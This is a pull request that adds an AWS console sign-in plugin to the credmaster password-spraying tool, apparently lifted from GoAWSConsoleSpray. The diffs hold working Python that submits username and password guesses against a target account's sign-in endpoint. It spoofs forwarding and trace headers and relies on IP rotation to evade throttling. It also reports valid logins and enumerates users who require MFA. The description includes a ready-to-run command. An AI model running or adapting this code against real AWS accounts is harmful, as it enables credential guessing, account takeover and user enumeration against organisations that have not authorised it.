### PR TITLE
Added "aws" module for console signins

### DIFF
--- a/plugins/aws/__init__.py
+++ b/plugins/aws/__init__.py
@@ -1,0 +1,51 @@
+import requests
+import utils.utils as utils
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def validate(pluginargs, args):
+    #
+    # Plugin Args
+    #
+    # --account <account_id>   -->  Account you are targeting
+    # --aws_region_spray --> <region> region to target
+    # --root -> Trying signing in with the root credentials
+    
+    if 'accounts' not in pluginargs.keys():
+        error = "Missing url argument, specify as --accounts <account_id> "
+        return False, error, None
+
+    if 'aws_region_spray' in pluginargs.keys():
+
+        region_spray = pluginargs['aws_region_spray']
+        pluginargs["url"] = f"https://{region_spray}.signin.aws.amazon.com"
+
+    else:
+        # Default to us-east-1 if not supplied
+        pluginargs["url"] = f"https://us-east-1.signin.aws.amazon.com"
+    
+    
+    return True, None, pluginargs
+    
+def testconnect(pluginargs, args, api_dict, useragent):
+
+    url = api_dict['proxy_url']
+
+    success = True
+    headers = {
+        'User-Agent' : useragent,
+        "X-My-X-Forwarded-For" : utils.generate_ip(),
+        "x-amzn-apigateway-api-id" : utils.generate_id(),
+        "X-My-X-Amzn-Trace-Id" : utils.generate_trace_id(),
+    }
+
+    headers = utils.add_custom_headers(pluginargs, headers)
+
+    resp = requests.get(api_dict['proxy_url'], headers=headers, verify=False)
+
+    if resp.status_code == 504:
+        output = "Testconnect: Connection failed, endpoint timed out, exiting"
+        success = False
+    else:
+        output = "Testconnect: Connection success, continuing"
+
+    return success, output, pluginargs

--- a/plugins/aws/__init__.py
+++ b/plugins/aws/__init__.py
@@ -10,8 +10,8 @@ def validate(pluginargs, args):
     # --aws_region_spray --> <region> region to target
     # --root -> Trying signing in with the root credentials
     
-    if 'accounts' not in pluginargs.keys():
-        error = "Missing url argument, specify as --accounts <account_id> "
+    if 'account' not in pluginargs.keys():
+        error = "Missing url argument, specify as --account <account_id> "
         return False, error, None
 
     if 'aws_region_spray' in pluginargs.keys():

--- a/plugins/aws/aws.py
+++ b/plugins/aws/aws.py
@@ -41,7 +41,7 @@ def aws_authenticate(url, username, password, useragent, pluginargs):
 
         # data returned
         data_response = {
-            'result' : None,  # Can be "success", "failure", "throttle", "mfa_blocked"
+            'result' : None,  # Can be "success", "failure", "throttle", "aws_mfa_blocked"
             'error' : False,
             'output' : "",
             'valid_user' : False
@@ -101,7 +101,7 @@ def aws_authenticate(url, username, password, useragent, pluginargs):
                     # Note: Returns MFA if username is correct regardless of what password is
                     if result == "MFA":
 
-                        data_response['result'] = "mfa_blocked"
+                        data_response['result'] = "aws_mfa_blocked"
                         data_response['output'] = f"[+] MFA RESTRICT: => {username_to_print}:{password} - User exists, but requires MFA. Password cannot be determined."
 
                         # TODO: Not sure if there is a native way in credmaster to remove this user from further guesses?
@@ -111,7 +111,7 @@ def aws_authenticate(url, username, password, useragent, pluginargs):
                     elif result == "SUCCESS":
 
                         data_response['result'] = "success"
-                        data_response['output'] = f"[+] SUCCESS: => {username_to_print}:{password} - {text}"
+                        data_response['output'] = f"[+] SUCCESS => {username_to_print}:{password}"
 
                     # Console User - Unknown
                     # Success for unknown use case

--- a/plugins/aws/aws.py
+++ b/plugins/aws/aws.py
@@ -1,0 +1,134 @@
+import requests
+import utils.utils as utils
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+# Lockout Risks
+# Ref: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_passwords_account-policy.html
+# You can't create a "lockout policy" to lock a user out of the account after a specified number of failed sign-in attempts.
+# TODO: Would be great if there was a way to designate in usernames file which usernames go with which account for multi-accounts
+
+def aws_authenticate(url, username, password, useragent, pluginargs):
+
+    target_accounts = pluginargs["accounts"].split(",")
+
+    for target_account in target_accounts:
+        sign_in_url = f"{url}/authenticate"
+
+        spoofed_ip = utils.generate_ip()
+        amazon_id = utils.generate_id()
+        trace_id = utils.generate_trace_id()
+
+        headers = {
+            "X-My-X-Forwarded-For" : spoofed_ip,
+            "x-amzn-apigateway-api-id" : amazon_id,
+            "X-My-X-Amzn-Trace-Id" : trace_id,
+            "User-Agent" : useragent,
+            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
+        }
+
+        headers = utils.add_custom_headers(pluginargs, headers)
+
+        post_params = {
+            "account": target_account,
+            "action": "iam-user-authentication",
+            "client_id": "arn:aws:signin:::console/canvas",
+            "username": username,
+            "password": password,
+            "redirect_uri": "https://console.aws.amazon.com/console",
+            "rememberAccount": "false",
+            "rememberMfa": "false"
+        }
+
+        # data returned
+        data_response = {
+            'result' : None,  # Can be "success", "failure", "throttle", "mfa_blocked"
+            'error' : False,
+            'output' : "",
+            'valid_user' : False
+        }
+
+        try:
+
+            # proxies = {
+            #    "http": "http://127.0.0.1:8080",
+            #    "https": "http://127.0.0.1:8080",
+            # }
+            http_output = requests.post(f"{sign_in_url}", headers=headers, data=post_params) #, proxies=proxies, verify=False)
+            
+            http_output_json = http_output.json()
+
+            username_to_print = f"arn:aws:iam::{target_account}:user/{username}"
+            if http_output.status_code == 429:
+                data_response['result'] = "throttle"
+                status_code = str(http_output.status_code)
+                data_response['output'] = f"[-] THROTTLED - {status_code} => {username_to_print}"
+
+            
+            elif http_output.status_code == 200:
+                region = pluginargs['aws_region_spray']
+                state = http_output_json["state"]
+                http_output_json_prop = http_output_json["properties"]
+                result = http_output_json_prop.get("result", "Unknown")
+                text = http_output_json_prop.get("text", "Unknown")
+
+                if state == "FAIL":
+                
+                    data_response['result'] = "failure"
+
+                    # Console User - MFA - Incorrect Region - Good/Bad Password
+                    # Console User - No MFA - Incorrect Region - Bad/Bad Password
+                    # Note: try passing in something like ca-west-1 when its not enabled in account to see region response
+                    if result == "OPT_IN_REGION_FAILURE":
+
+                        data_response['output'] = f"[-] FAILURE => {username_to_print}:{password} - {region} not enabled for account."
+
+                    # Console User - No MFA - Correct Region - Bad Password
+                    # Note: Returns redirect link
+                    elif result == "FAILURE":
+                        
+                        data_response['output'] = f"[-] FAILURE => {username_to_print}:{password} - {text}"
+
+                    # Console User - Unknown
+                    # Catch-All for unknown use case     
+                    else:
+                        data_response['result'] = "failure"
+                        data_response['output'] = f"[-] FAILURE => {username_to_print}:{password} - {http_output_json}"
+
+                elif state == "SUCCESS":
+
+                    # Console User - MFA - Correct Region - Good Password
+                    # Console User - MFA - Correct Region - Bad Password
+                    # Note: Returns MFA if username is correct regardless of what password is
+                    if result == "MFA":
+
+                        data_response['result'] = "mfa_blocked"
+                        data_response['output'] = f"[+] MFA RESTRICT: => {username_to_print}:{password} - User exists, but requires MFA. Password cannot be determined."
+
+                        # TODO: Not sure if there is a native way in credmaster to remove this user from further guesses?
+                        
+                    # Console User - No MFA - Correct Region - Good Password
+                    # Note: Returns redirect link
+                    elif result == "SUCCESS":
+
+                        data_response['result'] = "success"
+                        data_response['output'] = f"[+] SUCCESS: => {username_to_print}:{password} - {text}"
+
+                    # Console User - Unknown
+                    # Success for unknown use case
+                    else:
+                        data_response['result'] = "success"
+                        data_response['output'] = f"[+] UNKNOWN SUCCESS: => {username_to_print}:{password} Success with unknown response."
+                
+                # Console User - Unknown
+                # Catch-All for unknown use case
+                else:
+
+                    data_response['result'] = "failure"
+                    data_response['output'] = f"[-] FAILURE: {http_output.status_code} => Got an error we haven't seen before: {http_output_json_prop}"
+
+        except Exception as ex:
+            data_response['error'] = True
+            data_response['output'] = ex
+            pass
+
+    return data_response

--- a/plugins/aws/aws.py
+++ b/plugins/aws/aws.py
@@ -9,126 +9,126 @@ requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.
 
 def aws_authenticate(url, username, password, useragent, pluginargs):
 
-    target_accounts = pluginargs["accounts"].split(",")
 
-    for target_account in target_accounts:
-        sign_in_url = f"{url}/authenticate"
+    target_account = pluginargs["account"]
 
-        spoofed_ip = utils.generate_ip()
-        amazon_id = utils.generate_id()
-        trace_id = utils.generate_trace_id()
+    sign_in_url = f"{url}/authenticate"
 
-        headers = {
-            "X-My-X-Forwarded-For" : spoofed_ip,
-            "x-amzn-apigateway-api-id" : amazon_id,
-            "X-My-X-Amzn-Trace-Id" : trace_id,
-            "User-Agent" : useragent,
-            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
-        }
+    spoofed_ip = utils.generate_ip()
+    amazon_id = utils.generate_id()
+    trace_id = utils.generate_trace_id()
 
-        headers = utils.add_custom_headers(pluginargs, headers)
+    headers = {
+        "X-My-X-Forwarded-For" : spoofed_ip,
+        "x-amzn-apigateway-api-id" : amazon_id,
+        "X-My-X-Amzn-Trace-Id" : trace_id,
+        "User-Agent" : useragent,
+        "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
+    }
 
-        post_params = {
-            "account": target_account,
-            "action": "iam-user-authentication",
-            "client_id": "arn:aws:signin:::console/canvas",
-            "username": username,
-            "password": password,
-            "redirect_uri": "https://console.aws.amazon.com/console",
-            "rememberAccount": "false",
-            "rememberMfa": "false"
-        }
+    headers = utils.add_custom_headers(pluginargs, headers)
 
-        # data returned
-        data_response = {
-            'result' : None,  # Can be "success", "failure", "throttle", "aws_mfa_blocked"
-            'error' : False,
-            'output' : "",
-            'valid_user' : False
-        }
+    post_params = {
+        "account": target_account,
+        "action": "iam-user-authentication",
+        "client_id": "arn:aws:signin:::console/canvas",
+        "username": username,
+        "password": password,
+        "redirect_uri": "https://console.aws.amazon.com/console",
+        "rememberAccount": "false",
+        "rememberMfa": "false"
+    }
 
-        try:
+    # data returned
+    data_response = {
+        'result' : None,  # Can be "success", "failure", "throttle", "aws_mfa_blocked"
+        'error' : False,
+        'output' : "",
+        'valid_user' : False
+    }
 
-            # proxies = {
-            #    "http": "http://127.0.0.1:8080",
-            #    "https": "http://127.0.0.1:8080",
-            # }
-            http_output = requests.post(f"{sign_in_url}", headers=headers, data=post_params) #, proxies=proxies, verify=False)
+    try:
+
+        # proxies = {
+        #    "http": "http://127.0.0.1:8080",
+        #    "https": "http://127.0.0.1:8080",
+        # }
+        http_output = requests.post(f"{sign_in_url}", headers=headers, data=post_params) #, proxies=proxies, verify=False)
+        
+        http_output_json = http_output.json()
+
+        username_to_print = f"arn:aws:iam::{target_account}:user/{username}"
+        if http_output.status_code == 429:
+            data_response['result'] = "throttle"
+            status_code = str(http_output.status_code)
+            data_response['output'] = f"[-] THROTTLED - {status_code} => {username_to_print}"
+
+        
+        elif http_output.status_code == 200:
+            region = pluginargs['aws_region_spray']
+            state = http_output_json["state"]
+            http_output_json_prop = http_output_json["properties"]
+            result = http_output_json_prop.get("result", "Unknown")
+            text = http_output_json_prop.get("text", "Unknown")
+
+            if state == "FAIL":
             
-            http_output_json = http_output.json()
+                data_response['result'] = "failure"
 
-            username_to_print = f"arn:aws:iam::{target_account}:user/{username}"
-            if http_output.status_code == 429:
-                data_response['result'] = "throttle"
-                status_code = str(http_output.status_code)
-                data_response['output'] = f"[-] THROTTLED - {status_code} => {username_to_print}"
+                # Console User - MFA - Incorrect Region - Good/Bad Password
+                # Console User - No MFA - Incorrect Region - Bad/Bad Password
+                # Note: try passing in something like ca-west-1 when its not enabled in account to see region response
+                if result == "OPT_IN_REGION_FAILURE":
 
-            
-            elif http_output.status_code == 200:
-                region = pluginargs['aws_region_spray']
-                state = http_output_json["state"]
-                http_output_json_prop = http_output_json["properties"]
-                result = http_output_json_prop.get("result", "Unknown")
-                text = http_output_json_prop.get("text", "Unknown")
+                    data_response['output'] = f"[-] FAILURE => {username_to_print}:{password} - {region} not enabled for account."
 
-                if state == "FAIL":
-                
-                    data_response['result'] = "failure"
+                # Console User - No MFA - Correct Region - Bad Password
+                # Note: Returns redirect link
+                elif result == "FAILURE":
+                    
+                    data_response['output'] = f"[-] FAILURE => {username_to_print}:{password} - {text}"
 
-                    # Console User - MFA - Incorrect Region - Good/Bad Password
-                    # Console User - No MFA - Incorrect Region - Bad/Bad Password
-                    # Note: try passing in something like ca-west-1 when its not enabled in account to see region response
-                    if result == "OPT_IN_REGION_FAILURE":
-
-                        data_response['output'] = f"[-] FAILURE => {username_to_print}:{password} - {region} not enabled for account."
-
-                    # Console User - No MFA - Correct Region - Bad Password
-                    # Note: Returns redirect link
-                    elif result == "FAILURE":
-                        
-                        data_response['output'] = f"[-] FAILURE => {username_to_print}:{password} - {text}"
-
-                    # Console User - Unknown
-                    # Catch-All for unknown use case     
-                    else:
-                        data_response['result'] = "failure"
-                        data_response['output'] = f"[-] FAILURE => {username_to_print}:{password} - {http_output_json}"
-
-                elif state == "SUCCESS":
-
-                    # Console User - MFA - Correct Region - Good Password
-                    # Console User - MFA - Correct Region - Bad Password
-                    # Note: Returns MFA if username is correct regardless of what password is
-                    if result == "MFA":
-
-                        data_response['result'] = "aws_mfa_blocked"
-                        data_response['output'] = f"[+] MFA RESTRICT: => {username_to_print}:{password} - User exists, but requires MFA. Password cannot be determined."
-
-                        # TODO: Not sure if there is a native way in credmaster to remove this user from further guesses?
-                        
-                    # Console User - No MFA - Correct Region - Good Password
-                    # Note: Returns redirect link
-                    elif result == "SUCCESS":
-
-                        data_response['result'] = "success"
-                        data_response['output'] = f"[+] SUCCESS => {username_to_print}:{password}"
-
-                    # Console User - Unknown
-                    # Success for unknown use case
-                    else:
-                        data_response['result'] = "success"
-                        data_response['output'] = f"[+] UNKNOWN SUCCESS: => {username_to_print}:{password} Success with unknown response."
-                
                 # Console User - Unknown
-                # Catch-All for unknown use case
+                # Catch-All for unknown use case     
                 else:
-
                     data_response['result'] = "failure"
-                    data_response['output'] = f"[-] FAILURE: {http_output.status_code} => Got an error we haven't seen before: {http_output_json_prop}"
+                    data_response['output'] = f"[-] FAILURE => {username_to_print}:{password} - {http_output_json}"
 
-        except Exception as ex:
-            data_response['error'] = True
-            data_response['output'] = ex
-            pass
+            elif state == "SUCCESS":
+
+                # Console User - MFA - Correct Region - Good Password
+                # Console User - MFA - Correct Region - Bad Password
+                # Note: Returns MFA if username is correct regardless of what password is
+                if result == "MFA":
+
+                    data_response['result'] = "aws_mfa_blocked"
+                    data_response['output'] = f"[+] MFA RESTRICT: => {username_to_print}:{password} - User exists, but requires MFA. Password cannot be determined. Removing from future guesses"
+
+                    # TODO: Not sure if there is a native way in credmaster to remove this user from further guesses?
+                    
+                # Console User - No MFA - Correct Region - Good Password
+                # Note: Returns redirect link
+                elif result == "SUCCESS":
+
+                    data_response['result'] = "success"
+                    data_response['output'] = f"[+] SUCCESS => {username_to_print}:{password}"
+
+                # Console User - Unknown
+                # Success for unknown use case
+                else:
+                    data_response['result'] = "success"
+                    data_response['output'] = f"[+] UNKNOWN SUCCESS: => {username_to_print}:{password} Success with unknown response."
+            
+            # Console User - Unknown
+            # Catch-All for unknown use case
+            else:
+
+                data_response['result'] = "failure"
+                data_response['output'] = f"[-] FAILURE: {http_output.status_code} => Got an error we haven't seen before: {http_output_json_prop}"
+
+    except Exception as ex:
+        data_response['error'] = True
+        data_response['output'] = ex
+        pass
 
     return data_response


### PR DESCRIPTION
Basically just lifted code from https://github.com/WhiteOakSecurity/GoAWSConsoleSpray and embedded it in credmaster to take advantage of IP rotating, etc. Also does username enumeration to a degree for users with MFA codes so had to add a few bits of logic and a status code to main credmaster.py to handle that (see commit comments). Had some TODOs in commit comments not sure if they are possible in credmaster.

To run execute
```
python3 credmaster.py --plugin aws --account [account_number] --aws_region_spray [region_for_console_sign_in] --access_key [fireprox access key] --secret_access_key [fireprox secret access key] -u [usernamefile] -p [passwordfile]
```
